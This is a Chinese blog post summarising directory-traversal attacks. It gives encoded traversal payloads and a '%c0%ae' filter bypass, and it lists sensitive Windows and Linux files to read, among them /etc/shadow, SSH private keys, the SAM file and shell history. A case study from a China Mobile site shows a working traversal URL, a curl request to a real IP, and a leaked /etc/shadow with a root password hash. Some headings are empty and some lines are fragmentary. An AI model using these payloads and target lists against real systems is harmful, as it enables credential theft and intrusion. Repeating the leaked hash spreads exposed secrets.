目录遍历漏洞总结

漏洞介绍：跨目录读取敏感文件。

../ ..%2F %2e%2e%2f /%c0%ae/ /%c0%ae%c0%ae/

构造/../../../../../../etc/passwd,这是为了防止程序过滤或丢失最左侧的/符号，让起始目录变成脚本当前所在的目录。攻击者使用多个..符号，不断向上跳转，最终到达根/，而根/的父目录就是自己，因此使用再多的..都一样，最终停留在根/的位置，便可通过绝对路径去读取任意文件。

漏洞挖掘：

漏洞利用代码：

一些读取敏感文件：

Windows：    C:\boot.ini  //查看系统版本    C:\Windows\System32\inetsrv\MetaBase.xml  //IIS配置文件    C:\Windows\repair\sam  //存储系统初次安装的密码    C:\Program Files\mysql\my.ini  //Mysql配置    C:\Program Files\mysql\data\mysql\user.MYD  //Mysql root    C:\Windows\php.ini  //php配置信息    C:\Windows\my.ini  //Mysql配置信息    ... Linux：    /root/.ssh/authorized_keys    /root/.ssh/id_rsa    /root/.ssh/id_ras.keystore    /root/.ssh/known_hosts    /etc/passwd    /etc/shadow    /etc/my.cnf    /etc/httpd/conf/httpd.conf    /root/.bash_history    /root/.mysql_history    /proc/self/fd/fd[0-9]*(文件标识符)    /proc/mounts    /porc/config.gz　　/etc/issue 　　/proc/version 　　/etc/redhat-release  　　/etc/debian_version 　　/etc/slackware_version 　　/etc/*version 　　/proc/cpuinfo

案例：

直接访问javaweb配置文件不存在加子域名前缀不存在 %c0%ae 进行绕过 J2EE安全漏洞遇到各种猜测不到的可加此路径进行测试

中国移动某站任意文件读取

详细说明：

root权限，可以读取历史命令

http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history

cd

cd

ls

cd /

find ./ -name 'nginx*'

cd ./usr/local/nginx

ls

curl http://122.228.73.217:8081/../../../../../../../../etc/shadow

code 区域

root:$6$HsBNvUFk$OBVBzkLslX.mpswLYU4YWj7t8V9JcRHKeH0Db4BLWxiyL6M1BRk.SHizjqkO08bV8dODifCjmToxn56TXSTNR/:16808:0:99999:7::: bin:*:15980:0:99999:7::: daemon:*:15980:0:99999:7::: adm:*:15980:0:99999:7::: lp:*:15980:0:99999:7::: sync:*:15980:0:99999:7::: shutdown:*:15980:0:99999:7::: halt:*:15980:0:99999:7::: mail:*:15980:0:99999:7::: uucp:*:15980:0:99999:7::: operator:*:15980:0:99999:7::: games:*:15980:0:99999:7::: gopher:*:15980:0:99999:7:::

引用：

http://www.lijiejie.com/python-django-directory-traversal/

https://www.jianshu.com/p/f4b06f59c4cb

https://blkstone.github.io/2017/12/18/arbitary-file-read-exploit/

有些文件需要高权限才能读取

/etc/passwd
/etc/shadow
/etc/hosts
/root/.bashrc
/root/.bash_history
/root/.viminfo
/root/.ssh/id_rsa
/proc/xxxx/cmdline
数据库 config 文件
access.log, error.log
ssh 日志
/var/lib/php/sess_PHPSESSIDhttp://www.jianshu.com/p/2c24ea34566b)

uname -a
lsb_release -d
/etc/issue
/proc/version
/etc/redhat-release
/etc/debian_version
/etc/slackware_version
/etc/*version
/proc/cpuinfo

可以开虚拟机看看默认路径是什么

ssh

/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/etc/ssh/sshd_config
/var/log/secure

Nginx

/etc/nginx/nginx.conf
/var/www/html
/usr/local/services/nginx-1.6.2/logs/access.log
/usr/local/services/nginx-1.6.2/logs/error.log
/usr/local/services/nginx-1.6.2/nginx.conf
/usr/local/services/nginx-1.6.2/conf/nginx.conf
/usr/local/services/nginx-1.6.2/conf/proxy.conf
/usr/local/services/nginx-1.6.2/conf/extra/haolaiyao.conf

Apache

1 2	/home/httpd/ /home/httpd/www/

jetty

1
2
3

/usr/local/services/jetty-8.1.16/
/usr/local/services/jetty-8.1.16/logs/stderrout.log
/usr/local/services/jetty-8.1.16/etc/jetty.xml

resin

1
2
3

/usr/local/services/resin-4.0.44/
/usr/local/services/resin-4.0.44/conf/resin.xml
/usr/local/services/resin-4.0.44/conf/resin.properties

tomcat

1 2	/usr/local/services/apache-tomcat-8.0.23/logs /usr/local/services/apache-tomcat-8.0.23/logs/catalina.out

svn

1	/home/svnroot/

来源：博客园

作者：Junsec

链接：https://www.cnblogs.com/junsec/p/11452796.html

标签

root权限

漏洞挖掘

ssh

services

etc